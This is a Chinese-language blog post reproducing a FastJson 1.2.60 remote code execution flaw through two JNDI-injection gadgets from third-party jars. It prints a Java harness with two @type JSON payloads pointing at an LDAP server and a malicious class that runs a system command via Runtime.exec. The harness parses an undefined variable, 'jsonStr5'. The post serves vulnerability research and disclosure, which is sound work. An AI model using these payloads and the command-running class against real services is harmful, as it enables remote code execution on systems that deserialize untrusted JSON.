LoginSignup
0

More than 3 years have passed since last update.

[漏洞复现]FastJson 1.2.60远程代码执行漏洞(From第三方jar包)

Last updated at Posted at 2019-09-19

前言

最近有安全从业者——浅蓝色de忧伤在Freebuf发表了一文「抽象语法树分析寻找FastJSON的Gadgets」.根据他的文章两个FastJson用以JNDI注入的gadget随之公布,但目前FastJson官方并未将这两个gadget打入黑名单.

复现环境准备

  • 1.JDK 8U20
  • 2.所需jar清单如下
fastjson-1.2.60.jar
commons-configuration-1.4.jar
ojdbc14-10.2.0.2.0.jar
javax.resource-api-1.7.1.jar

FastJson复现

FastJsonTest.java

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.parser.ParserConfig;

public class FastJsonTest {
    public static void main(String[] args){

        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

        String jsonStr1 ="{\"@type\":\"oracle.jdbc.connector.OracleManagedConnectionFactory\",\"xaDataSourceName\":\"ldap://127.0.0.1:1389/ExportObject\"}";

        String jsonStr2 = "{\"@type\":\"org.apache.commons.configuration.JNDIConfiguration\",\"prefix\":\"ldap://127.0.0.1:1389/ExportObject\"}";

        JSONObject json = JSON.parseObject(jsonStr5);
        json.toJSONString();
    }
}

恶意类ExportObject.java

import java.io.BufferedReader;
import java.io.InputStreamReader;

public class ExportObject {
    public ExportObject() throws Exception {
        Process proc = Runtime.getRuntime().exec("open /Applications/Calculator.app");
        BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
        StringBuffer sb = new StringBuffer();

        String line;
        while((line = br.readLine()) != null) {
            sb.append(line).append("\n");
        }

        String result = sb.toString();
        Exception e = new Exception(result);
        throw e;
    }

    public static void main(String[] args) throws Exception {
    }
}

使用oracle.jdbc.connector.OracleManagedConnectionFactory payload 效果如下

oracle.jdbc.connector.OracleManagedConnectionFactory

使用org.apache.commons.configuration.JNDIConfiguration payload 效果如下

org.apache.commons.configuration.JNDIConfiguration

总结

这两个gadget,对于实战来说较为鸡肋.因为对于依赖的jar来说,并不是中间件或者JDK自带的jar,还需要手动开启AutoType.但这种利用AST语法树寻找利用类的方式值得学习.

后记

对于不会开启rmi和ldap服务的同学可以查阅我的文章——《如何快速开启RMI&&LDAP》,快速开启http服务可以使用python -m SimpleHTTPServer.
使用JNDI进行rce,请注意JDK对于JNDI的修复,可参考pyn3rd师傅的图

JDK对于JNDI的修复

鸣谢

pyn3rd

Reference

https://github.com/alibaba/fastjson/issues/2756
https://www.freebuf.com/articles/web/213327.html
https://mp.weixin.qq.com/s/TuQWvyro5vphyeZCAo_Y6g

招聘

亚信安全火爆招人中,请参阅下文(或在本公众号中寻找招聘简章)投递您的简历
https://mp.weixin.qq.com/s/88K0GFPWYXD5MlBioPd5qQ

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
What you can do with signing up
0